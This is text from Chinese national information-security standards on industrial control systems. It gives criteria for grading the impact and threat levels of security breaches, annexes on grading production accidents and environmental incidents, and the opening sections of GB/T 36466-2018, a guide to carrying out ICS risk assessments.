据没有遭受以未授权方式所作的更改或破坏,通常也包含工业控制系统的抗抵赖性、可核查 性、真实性等属性; c) 保密性:是指使信息不泄露给未授权的个人、实体、进程,或不被其利用的特性,确保工业控制 系统中保密或敏感信息在传输和存储中受到保护,能够防止窃听和非授权访问。 工业控制系统信息安全受到破坏是指,工业控制系统信息安全的可用性、完整性、保密性属性的部 分或全部受到破坏。在确认工业控制系统信息安全受到破坏中,需要分别查看这三个方面安全属性受到破坏的情况,并选择其中受到破坏最严重的安全属性的破坏程度,作为工业控制系统信息安全受到破 坏的程度。 6.4.2 依据侵害的客观方面进行分析 在客观方面,对受侵害对象的侵害外在表现为对工业控制系统本身的破坏。对工业控制系统的危 害方式表现为: a) 对工业控制系统提供的系统服务的破坏,是指对工业控制系统的正常运行受到性能下降、功能 失效、运行中断等,影响系统预定的工业控制系统目标的完成,破坏工业控制系统的可用性(如 系统可控性、业务连续性)、系统完整性、保密性; b) 对工业控制系统涉及的业务数据的破坏,是指工业控制系统中的相关数据、控制指令、保密信 息等数据被窃取、篡改、伪造等,破坏工业控制系统业务数据的完整性、可用性、保密性。 由于工业控制系统服务安全和工业控制系统业务数据安全受到破坏,所侵害的对象及其受侵害程 度可能会有所不同,在确定受侵害后的潜在影响过程中,需要分别处理这两种危害方式。对受侵害对象 的侵害程度的确认应按照工业控制系统服务安全和工业控制系统业务数据安全方式分别进行分析确 认,并选用受侵害后的潜在影响程度特征值较高者。 6.4.3 评价受侵害的对象 定级的工业控制系统信息安全受到破坏所侵害的对象包括国家安全(特别是其中的国家经济安 全),环境安全和人民生命安全、社会秩序稳定、公共利益、工业生产运行安全,以及公民、企业和其他组 织的合法权益及重要财产安全,以及工业控制系统及相关生产装置。 对定级的工业控制系统信息安全受到破坏所侵害的对象的确认,应根据以下条件的优先顺序,逐一 进行分析和选择: a) 侵害国家安全的事项: 是指定级的工业控制系统信息安全受到侵害,及其造成工业生产系统受到侵害,并由此产生对 国家安全的影响,造成国家外部的威胁和侵害,造成内部的混乱和疾患,造成危害国家的安全、 荣誉和利益的行为,主要包括以下方面: 1) 影响国家政权稳固和国防实力; 2) 影响国家统一、民族团结和社会安定; 3) 影响国家对外活动中的政治、经济利益; 4) 影响国家重要的安全保卫工作; 5) 影响国家经济竞争力和科技实力; 6) 其他影响国家安全的事项。 b) 侵害国家经济安全的事项: 是指定级的工业控制系统信息安全受到侵害,及其造成工业生产系统受到侵害,并由此产生对 国家经济安全的影响,主要包括以下方面: 1) 影响国家保持其经济存在和发展所需资源有效供给; 2) 影响经济体系独立稳定运行; 3) 影响整体经济福利; 4) 影响系统防护恶意侵害和非可抗力损害能力; 5) 影响国民经济发展和经济实力; 6) 其他影响国家经济安全的事项。 c) 侵害社会秩序稳定的事项: 是指定级的工业控制系统信息安全受到侵害,及其造成工业生产系统受到侵害,并由此产生对 社会秩序稳定的影响,主要包括以下方面: 1) 影响国家机关社会管理和公共服务的工作秩序; 2) 影响各种类型的经济活动秩序; 3) 影响各行业的科研、生产秩序; 4) 影响公众在法律约束和道德规范下的正常生活秩序等; 5) 其他影响社会秩序稳定的事项。 d) 侵害公共利益的事项: 是指定级的工业控制系统信息安全受到侵害,及其造成工业生产系统受到侵害,并由此产生对 公共利益及重要公共财产安全的影响,主要包括以下方面: 1) 影响社会成员使用公共设施; 2) 影响国有财产、劳动群众集体所有的财产安全或造成损失; 3) 影响社会成员获取公开信息资源; 4) 影响社会成员接受公共服务等方面; 5) 其他影响公共利益及重要公共财产安全的事项。 e) 侵害环境安全和人民生命安全的事项: 是指定级的工业控制系统信息安全受到侵害,及其造成工业生产系统受到侵害,并由此产生对 环境安全的影响,主要包括以下方面: 1) 影响工业控制系统及工业生产系统的生产技术性环境、相关自然生态环境,造成污染或 破坏; 2) 因环境污染或破坏直接导致人员死亡或中毒、造成人员疏散转移、造成直接经济损失、造 成区域生态功能丧失或国家重点保护物种灭绝、造成集中式饮用水水源地取水中断、造成 严重辐射污染后果等。 f) 侵害公民、企业和其他组织的合法权益及重要财产安全的事项: 是指定级的工业控制系统信息安全受到侵害,及其造成工业生产系统受到侵害,并由此产生对 公民、企业和其他组织的合法权益及财产安全的影响,主要包括以下方面: 1) 影响由法律确认的并受法律保护的公民、企业和其他组织所享有的社会权利和利益; 2) 影响公民、企业和其他组织所有的资金和物质财产损失; 3) 影响工业生产系统运行安全,引发的工业生产安全事故; 4) 影响公民、企业和其他组织的人员生命安全,直接或间接造成的相关人员的伤害。 g) 侵害工业生产运行安全的事项: 是指定级的工业控制系统信息安全受到侵害,直接产生对其控制范围内的以及上下游相关的 工业生产运行安全的影响,主要包括以下方面: 1) 影响工业生产运行的有关过程不能正常; 2) 影响工业生产运行的业务连续性,出现运行中断; 3) 影响工业生产运行安全,发生生产安全事故,甚至影响人员生命财产安全; 4) 影响工业生产运行安全,发生突发环境事件,甚至影响环境安全; 5) 其他影响工业生产运行安全的事项。 h) 侵害工业控制系统及相关生产装置安全的事项: 是指定级的工业控制系统信息安全受到侵害,及其造成工业控制系统自身功能受到损害或丧 失,并由此产生对其所控制的相关生产装置功能受到损害或丧失,以致影响工业生产运行安 全,主要包括以下方面: 1) 工业控制系统自身功能不能正常; 2) 工业控制系统自身功能完全丧失; 3) 工业控制系统自身受到毁坏; 4) 工业控制系统相关生产装置功能不能正常; 5) 工业控制系统相关生产装置功能受到损害或丧失; 6) 工业控制系统相关生产装置受到毁坏。 6.4.4 评价受侵害的程度 6.4.4.1 判定对国家安全的侵害程度 当工业控制系统信息安全受到破坏时,造成对国家安全的侵害程度,判定条件如下: a) 一般损害:当对国家的安全、荣誉和利益未造成影响或造成较小的危害,可判定对国家安全的 侵害程度为一般损害; b) 严重损害:当对国家的安全、荣誉和利益造成较严重的危害,可判定对国家安全的侵害程度为 严重损害; c) 特别严重损害:当对国家的安全、荣誉和利益造成非常严重危害,可判定对国家安全的侵害程 度为特别严重损害。 6.4.4.2 判定对国家经济安全的侵害程度 当工业控制系统信息安全受到破坏时,造成对国家经济安全的侵害程度,判定条件如下: a) 一般损害:当对国民经济发展和经济实力未造成影响或造成较小的破坏时,可判定对国家经济 安全的侵害程度为一般损害; b) 严重损害:当对国民经济发展和经济实力造成较严重的破坏时,可判定对国家经济安全的侵害 程度为严重损害; c) 特别严重损害:当对国民经济发展和经济实力造成非常严重破坏时,可判定对国家经济安全的 侵害程度为特别严重损害。 6.4.4.3 判定对社会秩序稳定的侵害程度 当工业控制系统信息安全受到破坏时,造成对社会秩序稳定的侵害程度,判定条件如下: a) 一般损害:当对国家机关社会管理和公共服务的工作秩序、各类经济活动秩序、各行业科研及 生产秩序、正常生活秩序产生有限的社会不良影响,可判定对社会秩序稳定的侵害程度为一般 损害; b) 严重损害:当对国家机关社会管理和公共服务的工作秩序、各类经济活动秩序、各行业科研及 生产秩序、正常生活秩序产生较大范围的社会不良影响,可判定对社会秩序稳定的侵害程度为 严重损害; c) 特别严重损害:当对国家机关社会管理和公共服务的工作秩序、各类经济活动秩序、各行业科 研及生产秩序、正常生活秩序产生大范围的社会不良影响,可判定对社会秩序稳定的侵害程度 为特别严重损害。 6.4.4.4 判定对公共利益的侵害程度 当工业控制系统信息安全受到破坏时,造成对公共利益及重要公共财产安全的侵害程度,判定条件 如下: a) 一般损害:当对社会成员使用公共设施、获取公开信息资源、接受公共服务等公共利益产生有 限的社会不良影响,对重要公共财产造成较小损失,可判定对公共利益、重要公共财产的侵害 程度为一般损害; b) 严重损害:当对社会成员使用公共设施、获取公开信息资源、接受公共服务等公共利益产生较 大范围的社会不良影响,对重要公共财产造成较高损失,可判定对公共利益、重要公共财产的 侵害程度为严重损害; c) 特别严重损害:当对社会成员使用公共设施、获取公开信息资源、接受公共服务等公共利益产 生大范围的社会不良影响,对重要公共财产造成极高损失,可判定对公共利益、重要公共财产 的侵害程度为特别严重损害。 6.4.4.5 判定对环境安全和人员生命安全的侵害程度 当工业控制系统信息安全受到破坏时,造成对环境安全和人员生命安全的侵害程度,可通过生产安 全事故和突发环境事件的等级表述,判定条件如下: a) 生产安全事故等级:根据国务院第493号令中规定的条件(见附录 A 中 A.1), 确定为下列等级 之一: 1) 特别重大事故; 2) 重大事故; 3) 较大事故; 4) 一般事故。 b) 突发环境事件等级:根据环境保护部令第17号中规定的条件(见附录 A 中 A.2), 确定为下列 等级之一: 1) 特别重大(I 级)突发环境事件; 2) 重大(Ⅱ级)突发环境事件; 3) 较大(Ⅲ级)突发环境事件; 4) 一 般(IV级)突发环境事件。 6.4.4.6 判定对公民、企业和其他组织的合法权益及重要财产安全的侵害程度 当工业控制系统信息安全受到破坏时,造成对公民、企业、其他组织的合法权益及重要财产安全的 侵害程度,判定条件如下: a) 一般损害:当对公民、企业、其他组织的工作职能产生局部影响,业务能力有所降低但不影响主 要功能的执行,出现较轻的法律问题,以及较低的财产损失时,可判定对公民、企业、其他组织 的合法权益及重要财产安全的侵害程度为一般损害; b) 严重损害:当对公民、企业、其他组织的工作职能产生严重影响,业务能力显著下降且严重影响 主要功能执行,出现较严重的法律问题,以及较高的财产损失时,可判定对公民、企业、其他组 织的合法权益及重要财产安全的侵害程度为严重损害; c) 特别严重损害:当对公民、企业、其他组织的工作职能产生特别严重影响或丧失行使能力,业务 能力严重下降或功能无法执行,出现极其严重的法律问题,以及极高的财产损失时,可判定公 民、企业、其他组织的合法权益及重要财产安全的侵害程度为特别严重损害。 6.4.4.7 判定对工业生产运行安全的侵害程度 当工业控制系统信息安全受到破坏时,造成对其范围内相关工业生产运行安全的侵害程度,判定条 件如下: a) 一般损害:判定对工业生产系统运行安全的侵害程度为一般损害的条件为: 1) 对工业生产系统的任务无影响、整体功能有所下降或一部分任务不能完成; 2) 出现部分系统故障或功能下降,能够通过调整消除故障或能够立即修复出现的故障; 3) 可能出现较轻的过程安全、业务连续性问题; 4) 对工业生产系统运行的地理区域、人群区域、生产生活领域、时间跨度影响较小; 5) 不会发生生产安全事故或突发环境事件。 b) 严重损害:判定对工业生产系统运行安全的侵害程度为严重损害的条件为: 1) 对工业生产系统的大部分任务不能完成或整体功能严重下降; 2) 出现部分系统的功能严重下降或产生中断,出现的故障不能立即通过检修予以修复; 3) 可能出现严重的过程安全、业务连续性问题,或者较轻的人员安全、环境安全; 4) 对工业生产系统运行的地理区域、人群区域、生产生活领域、时间跨度影响为中等; 5) 可能会发生一般、较大的生产安全事故或突发环境事件(见附录 A)。 c) 特别严重损害:判定对工业生产系统运行安全的侵害程度为特别严重损害的条件为: 1) 对工业生产系统的整体任务不能完成或功能部分丧失; 2) 出现部分系统的功能全部丧失或完全中断,出现的故障需经彻底修理才能消除; 3) 可能出现特别严重的过程安全、业务连续性问题,或者严重的人员安全、环境安全; 4) 对工业生产系统运行的地理区域、人群区域、生产生活领域、时间跨度影响为较大; 5) 可能会发生重大、特别重大的生产安全事故或突发环境事件(见附录 A)。 6.4.4.8 判定对工业控制系统及相关生产装置的侵害程度 当工业控制系统信息安全受到破坏时,造成对工业控制系统及相关装置的侵害程度,判定条件 如下: a) 一般损害:当对工业控制系统及相关装置产生局部影响或较轻影响,生产过程局部且非关键部 位丧失完整性或可用性,较轻地干扰了生产过程的准确顺序或协调性,未产生设备功能受到损 害或丧失,没有导致停工、重新加工、重新设计,对上游或下游生产过程没有产生影响,可判定 对工业控制系统及相关装置的侵害程度为一般损害; b) 严重损害:当对工业控制系统及相关装置产生关键部位的影响或严重影响,生产过程关键部位 丧失完整性或可用性,严重地干扰了生产过程的准确顺序或协调性,产生了设备功能受到损害 或丧失但资产更新产生的成本不高,导致短时间的停工且在短时间内恢复工业过程控制,对上 游或下游生产过程产生较轻影响,可判定对工业控制系统及相关装置的侵害程度为严重损害; c) 特别严重损害:当对工业控制系统及相关装置产生全局影响或特别严重影响,生产过程全部丧 失完整性或可用性,产生了设备功能受到损害或丧失且资产更新产生的成本很高,导致停工且 不能在短时间内恢复工业过程控制,甚至需要重新加工、重新设计,对上游或下游生产过程产 生严重影响,或泄露了知识产权丧失竞争优势(如生产过程的技术秘密),可判定对工业控制系 统及相关装置的侵害程度为严重损害。 6.4.5 评价受侵害后的潜在影响程度 受侵害后潜在影响程度用其特征值表示,评价工业控制系统受侵害后的潜在影响程度,包括: a) 确定受侵害的对象(5.2.2.2),按照6.4.3提供的方法,分析工业控制系统信息安全受到破坏后 受侵害的对象,判定为下列受侵害的对象中的一个或几个: 1) 工业控制系统及相关生产装置安全; 2) 工业生产运行安全和公民、企业、其他组织的合法权益及重要财产安全; 3) 环境安全、社会秩序、公共利益和人员生命安全; 4) 国家安全(特别是其中的国家经济安全)。 b) 确定受侵害的程度(5.2.2.3),分析工业控制系统信息安全受到破坏后对受侵害对象的侵害 程度: 1) 按照6.4.4.1提供的方法,判定对国家安全的侵害程度;按照6.4.4.2提供的方法,判定对 国家经济安全的侵害程度;选择其中侵害程度高的作为对“国家安全(特别是其中的国家 经济安全)”的侵害程度; 2) 按照6.4.4.3提供的方法,判定对社会秩序稳定的侵害程度;按照6.4.4.4提供的方法,判 定对公共利益及重要公共财产安全的侵害程度;按照6.4.4.5提供的方法,判定对环境安 全和人员生命安全的侵害程度;选择其中侵害程度最高的作为对“环境安全、社会秩序、公 共利益和人员生命安全”的侵害程度; 3) 按照6.4.4.6 提供的方法,判定对公民、企业和其他组织的合法权益及重要财产安全的侵 害程度;按照6.4.4.7提供的方法,判定对工业生产运行安全的侵害程度;选择其中侵害程 度高的作为对“工业生产运行安全和公民、企业、其他组织的合法权益及重要财产安全”的 侵害程度; 4) 按照6.4.4.8提供的方法,判定对“工业控制系统及相关生产装置安全”的侵害程度; 5) 上述判定的对受侵害对象的侵害程度按照下列受侵害程度之一表示: ——造成一般损害; ——造成严重损害; ——造成特别严重损害。 c) 根据 a) 判定的一个或几个受侵害对象,以及根据 b) 判定的对相应受侵害对象的侵害程度,逐 一按照5.2.2.1的要求,分析工业控制系统受侵害后潜在影响的相关内容,分别依照表3得出 工业控制系统受侵害潜在影响程度特征值,并选择其中最高者作为工业控制系统受侵害潜在 影响程度特征值。影响程度特征值取值范围是由低到高1~5,共5个等级。 6.5 确定需抵御的信息安全威胁程度 6.5.1 评价面临的信息安全威胁 评价工业控制系统面临的信息安全威胁,包括: a) 分析定级的工业控制系统可能面临的各种威胁,如: 1) 按照5.2.3.2 列出的常见威胁列表; 2) 查阅企业、行业或业界已有的威胁列表和统计数据; 3) 查阅国际组织发布的关于定级的工业控制系统及其组件面临的威胁; 4) 收集定级的工业控制系统及其组件以往安全事件报告中出现过的威胁; 5) 收集定级的工业控制系统有关现场检测工具以及各种日志发现的威胁; 汇集上述威胁信息被综合分析,建立定级的工业控制系统可能面临威胁的列表。 b) 根据5.2.3.2c), 对上述威胁列表中每个威胁评价其威胁程度并确定其特征值(取值范围为1~ 5),形成定级的工业控制系统完整的威胁列表。 6.5.2 评价信息安全事件可能性 评价信息安全事件可能性的目的是识别威胁和估算其发生可能性,应考虑来自事件和以往威胁评 估的内部经验,关注相关威胁的持续变化,特别是当业务环境或工业控制系统发生变化时。评价信息安 全事件可能性包括: a) 根据6.5.1形成的威胁列表,对确定存在每一种威胁逐一分析其发生频度: 1) 收集定级的工业控制系统以往安全事件报告中、各种日志中或现场检测工具发现的威胁 发生的频度; 2) 收集行业(或企业)内类似工业控制系统的威胁发生的频度; 3) 收集国际组织发布的类似工业控制系统的威胁发生的频度; 4) 其中,威胁发生频度分为高、中、低,对没有发生过定为发生频度低,发生过1次定为发生 频度中,发生过多次定为发生频度高; 5) 选择1)~3)中发生频度的最高者作为定级的工业控制系统对该指定威胁发生的频度。 b) 识别工业控制系统存在的固有脆弱性,即工业控制系统、相关生产装置以及所属企业或行业本 身固有的,而非某个工业控制系统个体原因(如人为疏忽)造成的脆弱性,如: 1) 用于易燃易爆、强辐射、剧毒等危险品生产的工业控制系统; 2) 用于野外或难以监管的工业控制系统; 3) 受行业生产条件限制或技术水平限制,存在一定缺陷的业工业控制系统; 4) 工业控制系统所属企业或行业固有的单个和聚集的脆弱性; 5) 对意外的威胁或环境的威胁,如地理因素、极端天气情况的可能性、可能导致人为错误或 设备故障的因素; 6) 应关注工业控制系统固有脆弱性可利用容易度的变化,当环境变化、技术变化、系统部件 的故障,替换部件的不可用、人员流动、以及更高级的威胁出现的影响, 一个最初只包含有 限固有脆弱性的工业控制系统,可能会变得更易受攻击。 c) 识别工业控制系统存在固有脆弱性的相关因素: 1) 工业控制系统资产的吸引力或可能影响较高; 2) 工业控制系统受侵害后可造成影响或获得收益的容易度较高; 3) 工业控制系统面临威胁发起者的技术能力和占有资源的强度较高; 4) 工业控制系统受影响客体的可补救性成本较高。 d) 根据6.5.1形成的威胁列表,对每个威胁逐一分析定级的工业控制系统固有脆弱性被相应威胁可利用容易度: 1) 当定级的工业控制系统不符合上述 b) 和 c) 的条件时,其固有脆弱性被相应威胁可利用容易度定为低: 2) 当定级的工业控制系统存在上述 b) 和 c) 的条件之一时,其固有脆弱性被相应威胁可利用容易度定为中: 3) 当定级的工业控制系统同时存在上述 b) 和 c) 的条件时,其固有脆弱性被相应威胁可利用容易度定为高。 e) 根据6.5.1形成的威胁列表,对每个威胁逐一分析信息安全事件可能性,取决于定级的工业控 制系统对该指定威胁发生的频度[6.5.2a]] 、定级的工业控制系统固有脆弱性被相应威胁可利容易度[6.5.2d]] 两个条件 信息安全事件 可能性 固有脆弱性可利用容易度 低 中 高 威胁 发生 频度 低 1 2 3 中 2 3 4 高 3 4 5 f) 根据信息安全事件可能性估算表,其中特征值为1~5,一般可对特征值为1~2者定为事件可 能性低,对特征值为3~5者定为事件可能性高;但由于工业控制系统所属企业或行业通常对 待安全事件可能性的敏感程度,或对安全事件发生的可接受程度进行判断存在一定差异,甚至 可以容忍一定概率的信息安全事件发生,因此确定事件发生可能性的特征值范围可以依据行 业具体情况适当调整,如特征值2~5为高,或特征值4~5为高,但同一行业类似的工业控制 系统应保持一致。 g) 根据以上分析,对威胁列表的每个威胁逐一给出信息安全事件发生的可能性“高”或“低”的 评价。 6.5.3 评价需抵御的信息安全威胁程度 评价工业控制系统需抵御的信息安全威胁程度,包括: a) 根据6.5.2形成的威胁列表,选择所有信息安全事件发生的可能性“高”的威胁作为定级的工 业控制系统需抵御的信息安全威胁; b) 比较定级的工业控制系统需抵御的所有信息安全威胁,选择其中威胁程度特征值(取值范围为 1~5)最高者,判定为定级的工业控制系统需抵御的信息安全威胁程度特征值。 6.6 确定工业控制系统信息安全等级 根据5.1的要求,用已确定的工业控制系统资产重要程度特征值、受侵害潜在影响程度特征值、需 抵御的信息安全威胁程度特征值,在表1中查找对应的级别,即可确定基于工业控制系统信息安全风险 的工业控制系统信息安全等级。 有关生产安全事故和突发环境事件分级 A.1 生产安全事故分级 国务院第493号令中,生产经营活动中发生的造成人身伤亡或者直接经济损失的生产安全事故等 级规定如下: 根据生产安全事故(以下简称事故)造成的人员伤亡或者直接经济损失,事故一般分为以下等级: (一)特别重大事故,是指造成30人以上死亡,或者100人以上重伤(包括急性工业中毒,下同),或 者1亿元以上直接经济损失的事故; (二)重大事故,是指造成10人以上30人以下死亡,或者50人以上100人以下重伤,或者5000万 元以上1亿元以下直接经济损失的事故; (三)较大事故,是指造成3人以上10人以下死亡,或者10人以上50人以下重伤,或者1000万元 以上5000万元以下直接经济损失的事故; (四)一般事故,是指造成3人以下死亡,或者10人以下重伤,或者1000万元以下直接经济损失的 事故。 国务院安全生产监督管理部门可以会同国务院有关部门,制定事故等级划分的补充性规定。 本条款所称的“以上”包括本数,所称的“以下”不包括本数。 A.2 突发环境事件分级 A.2.1 说明 环境保护部令第17号中,规定了突发环境事件分级的标准。按照突发环境事件严重性和紧急程 度,突发环境事件分为特别重大(I 级)、重大(Ⅱ级)、较大(Ⅲ级)和一般(IV 级)四级。为便于本标准应 用,现将相关内容摘录如下。 A.2.2 突发环境事件分级条件摘要 A.2.2.1 特别重大(I 级)突发环境事件 凡符合下列情形之一的,为特别重大突发环境事件: a) 因环境污染直接导致10人以上死亡或100人以上中毒的; b) 因环境污染需疏散、转移群众5万人以上的; c) 因环境污染造成直接经济损失1亿元以上的; d) 因环境污染造成区域生态功能丧失或国家重点保护物种灭绝的; e) 因环境污染造成地市级以上城市集中式饮用水水源地取水中断的; f) 1、2类放射源失控造成大范围严重辐射污染后果的;核设施发生需要进入场外应急的严重核 事故,或事故辐射后果可能影响邻省和境外的,或按照“国际核事件分级(INES) 标准2)”属于 3级以上的核事件;台湾核设施中发生的按照“国际核事件分级(INES) 标准”属于4级以上的 核事故;周边国家核设施中发生的按照“国际核事件分级(INES) 标准”属于4级以上的核 事故; g) 跨国界突发环境事件 A.2.2.2 重大(Ⅱ级)突发环境事件 凡符合下列情形之一的,为重大突发环境事件: a) 因环境污染直接导致3人以上10人以下死亡或50人以上100人以下中毒的; b) 因环境污染需疏散、转移群众1万人以上5万人以下的; c) 因环境污染造成直接经济损失2000万元以上1亿元以下的; d) 因环境污染造成区域生态功能部分丧失或国家重点保护野生动植物种群大批死亡的; e) 因环境污染造成县级城市集中式饮用水水源地取水中断的; f) 重金属污染或危险化学品生产、贮运、使用过程中发生爆炸、泄漏等事件,或因倾倒、堆放、丢 弃、遗撒危险废物等造成的突发环境事件发生在国家重点流域、国家级自然保护区、风景名胜 区或居民聚集区、医院、学校等敏感区域的; g) 1、2类放射源丢失、被盗、失控造成环境影响,或核设施和铀矿冶炼设施发生的达到进入场区 应急状态标准的,或进口货物严重辐射超标的事件; h) 跨省(区、市)界突发环境事件。 A.2.2.3 较大(Ⅲ级)突发环境事件 凡符合下列情形之一的,为较大突发环境事件: a) 因环境污染直接导致3人以下死亡或10人以上50人以下中毒的; b) 因环境污染需疏散、转移群众5000人以上1万人以下的; c) 因环境污染造成直接经济损失500万元以上2000万元以下的; d) 因环境污染造成国家重点保护的动植物物种受到破坏的; e) 因环境污染造成乡镇集中式饮用水水源地取水中断的; f) 3 类放射源丢失、被盗或失控,造成环境影响的; g) 跨地市界突发环境事件。 A.2.2.4 一般(N 级)突发环境事件 除特别重大突发环境事件、重大突发环境事件、较大突发环境事件以外的突发环境事件。
standards
信息安全技术 工业控制系统风险评估实施指南 Information security technology Implementation guide to risk assessment of industrial control systems 随着工业控制系统和信息化技术的融合,工业控制系统广泛应用于冶金、电力、石化、水处理、铁路、 航空和食品加工等行业。工业控制系统指应用于工业控制领域的数据采集、监视与控制系统,是由计算 机设备、工业过程控制组件和网络组成的控制系统,是工业领域的神经中枢。工业中使用的控制系统包 括监视控制与采集系统、分布式控制系统、可编程逻辑控制器系统等。我国把工业控制系统信息安全作 为信息安全保障的一个相对独立的体系进行建设,其安全性将直接关系到国家重要基础工业设施生产 的正常运行和广大公众的利益。 本标准在对工业控制系统的资产进行整理分析的基础上,从其资产的安全特性出发,分析工业控制 系统的威胁来源与自身脆弱性,归纳出工业控制系统面临的信息安全风险,并给出实施工业控制系统风 险评估的指导性建议。 本标准主要为第三方安全检测评估机构在工业控制系统现场实施风险评估提供指南,也可供工业 控制系统业主单位进行自评估时参考。 信息安全技术 工业控制系统风险评估实施指南 1 范围 本标准规定了工业控制系统风险评估实施的方法和过程。 本标准适用于指导第三方安全检测评估机构对工业控制系统的风险评估实施工作,也可供工业控 制系统业主单位进行自评估时参考。 2 规范性引用文件 下列文件对于本文件的应用是必不可少的。凡是注日期的引用文件,仅注日期的版本适用于本文 件。凡是不注日期的引用文件,其最新版本(包括所有的修改单)适用于本文件。 GB/T 20984—2007 信息安全技术 信息安全风险评估规范 GB/T 31509—2015 信息安全技术 信息安全风险评估实施指南 GB/T 32919—2016 信息安全技术 工业控制系统安全控制应用指南 ISO/IEC62264-1:2013 企业控制系统综合 第1部分:模型和术语(Enterprise-control system integration—Part 1:Models and terminology) 3 术语、定义和缩略语 3.1 术语和定义 GB/T 31509—2015 和 GB/T32919—2016 中界定的以及下列术语和定义适用于本文件。 3.1.1 监视控制数据采集系统 supervisory control and data acquisition system;SCADA 在工业生产控制过程中,对大规模远距离地理分布的资产和设备在广域网环境下进行集中式数据 采集与监控管理的控制系统。 3.1.2 分布式控制系统 distributed control system;DCS 以计算机为基础,在系统内部(单位内部)对生产过程进行分布控制、集中管理的系统。 3.1.3 主终端单元 master terminal unit;MTU 用于生产过程信息收集和检测的工业控制系统总站。 注: 一般部署在调度控制中心。 3.1.4 远程终端单元 remote terminal unit;RTU 用于监测、控制远程工业生产装备的工业控制系统远程站点设备。 3.1.5 可编程逻辑控制器 programmable logic controller;PLC 采用可编程存储器,通过数字运算操作对工业生产装备进行控制的电子设备。 3.1.6 智能电子设备 intelligent electronic device;IED 用于生产过程的信息采集、自动测量记录和传导,通过网络与MTU 保持通信的智能化电子设备。 注:一般部署在管网站场。 3.1.7 人机界面 human-machine interface;HMI 为操作者和控制器之间提供操作界面和数据通信的软硬件平台。 3.2 缩略语 下列缩略语适用于本文件。 ICS 工业控制系统(Industrial Control System) SCADA 监视控制与数据采集系统(Supervisory Control And Data Acquisition) DCS 分布式控制系统(Distributed Control System) PLC 可编程逻辑控制器(Programmable Logic Controller) RTU 远程终端设备(Remote Terminal Unit) MTU 主终端设备(Master Terminal Unit) ACL 访问控制列表(Access Control List) DNS 域名系统(Domain Name System) DHCP 动态主机配置协议(Dynamic Host Configuration Protocol) DNP 分布式网络协议(Distributed Network Protocol) RPC 远程过程调用协议(Remote Procedure Call Protocol) DCOM 分布式组件对象模式(Microsoft Distributed Component Object Model) OPC 用于过程控制的对象连接与嵌入(Object Linking and Embedding for Process Control) DoS 拒绝服务(Denial of Service) CAN 控制器局域网络(Controller Area Network) UPS 不间断电源(Uninterruptible Power System) HMI 人机界面(Human Machine Interface) CVSS 通用漏洞评分系统(Common Vulnerability Scoring System) 4 概述 4.1 工业控制系统层次结构模型 工业控制系统应用的技术领域、行业特点或者承载的业务类型的差异化导致实际中工业控制 系统的架构差别较大。为了就典型的工业控制系统的功能特点和部署形式达成共识,本标准依据 ISO/IEC 62264-1:2013 的层次结构模型,给出了通用的工业控制系统的层次结构模型。 根据层次结构模型图中所述,企业资源层与生产管理层中用到的多为传统信息系统中通用的软件 和硬件,GB/T31509—2015 给出了相应的评估方法。过程监控层、现场控制层和现场设备层是工业控 制系统中特有的部分。本标准主要规范这3个层面的风险评估的实施工作。 4.2 实施原则及工作形式 GB/T 31509—2015规定了风险评估实施的原则,包括标准性原则、关键业务原则、可控性原则及 最小影响原则。 GB/T 20984—2007 明确了风险评估的基本工作形式是自评估与检查评估。无论自评估或检查评 估均可委托第三方工业控制系统风险评估机构实施。 4.3 框架及流程 4.3.1 风险要素关系 风险评估中各要素及其关系 工业控制系统风险评估的基本要素包括资产、威胁、保障能力以及脆弱性。风险评估围绕这些基本 要素展开,在对这些基本要素的评估过程中需要充分考虑与基本要素相关的各类属性。风险基本要素 与属性间存在如下的关系: a) 工业生产运行依赖资产去实现; b) 资产具有资产价值,体现在工业生产运行以及系统信息安全对资产的依赖程度,依赖度越高, 资产价值越大; c) 资产面临威胁,资产价值越大则其面临的威胁越大; d) 保障能力可保护资产安全,抵御威胁,保障能力越强,资产面临的威胁越少; e) 风险是由威胁引发的,资产面临的威胁越多则其风险越大; f) 脆弱性会影响资产安全,威胁可利用脆弱性来损害资产,从而形成风险; g) 脆弱性越多,安全风险的可能性越大; h) 保障能力可减少脆弱性,降低安全风险; i) 需要结合资产价值综合考虑保障能力的实施成本; j) 保障能力可抵御威胁,弥补或减少脆弱性,降低安全风险。 风险不可能降低到零,在实施了安全措施后还会有残留风险。有些残留风险来自于保障能力的不 足,需要加强控制,而有些残留风险则是在综合考虑了安全成本与效益后未控制的风险,是可以被接受 的风险。 4.3.2 风险评估流程 工业控制系统风险评估实施分为3个阶段,包括:风险评估准备阶段、风险要素评估阶段、综合分析 阶段。根据工业控制系统风险评估的不同阶段,评估方制定相应的工作计划,保证评估工作的顺利 进行。 5 实施方法 5.1 概述 对工业控制系统进行风险评估需要进行调查、取证、分析和测试。工业控制系统风险评估的方法主 要有5种:文档查阅、现场访谈、现场核查、现场测试和模拟仿真环境测试。 5.2 文档查阅 文档查阅用于确认被评估方的政策及技术方面是否全面且是最新的。被评估方应提供评估所需的 GB/T 36466—2018 文件,以确保评估方对其进行全面审查。评估方查阅被评估方的工业控制系统规划设计方案、网络拓扑 图、系统安全防护计划、安全策略、架构、要求、标准作业程序、授权协议、系统互连备忘录、信息安全事件 应急响应计划等文档,评估其准确性和完整性。 文档查阅有助于评估方了解工业控制系统的基本信息,包括网络拓扑结构、主要软硬件构成等。文 档查阅可以发现可能导致丢失、不足或不正确执行的安全策略。评估方需验证被评估方的文档是否符 合标准和法规,查找被评估方政策的缺陷、过时内容或不合理。 实施指南如下: a) 评估方在准备阶段编制一份通用的工业控制系统风险评估文档查阅所需文件目录; b) 被评估方根据文件目录提供相对应的文档; c) 评估方审查相关文档内容是否完整合规; d) 当所需文件不可调阅或不存在时,评估方对其进行标注,并就相关内容与被评估方沟通。 5.3 现场访谈 现场访谈用于收集客观事实材料,补充在文档查阅中未被发现的工业控制系统细节,进一步理解和 洞察工业控制系统的开发、集成、供应、使用、管理等过程。 评估方应在评估实施之前准备好访谈问卷或调查表。访谈中,可以根据被访者的反映,对调查问题 作调整或展开。现场访谈调查表参见附录A。 实施指南如下: a) 评估方在评估准备阶段编制一份通用工业控制系统风险评估访谈调查表; b) 被评估方根据具体问题分配不同的人员配合评估方访谈,分配的人员应是最熟悉该评估对象 的人员; c) 若访谈对象对某些问题无法给出确定的答复,应对该问题进行标注,并在后续评估过程中对其 进行确认; d) 对访谈中需要验证的问题进行标注,以备后期现场核查及技术确认; e) 访谈对象在访谈结束后对访谈记录进行核查,若无误则需进行签字确认。 5.4 现场核查 现场核查是在工业控制系统现场生产环境下进行的核查工作,能够真实地反应系统的安全问题。 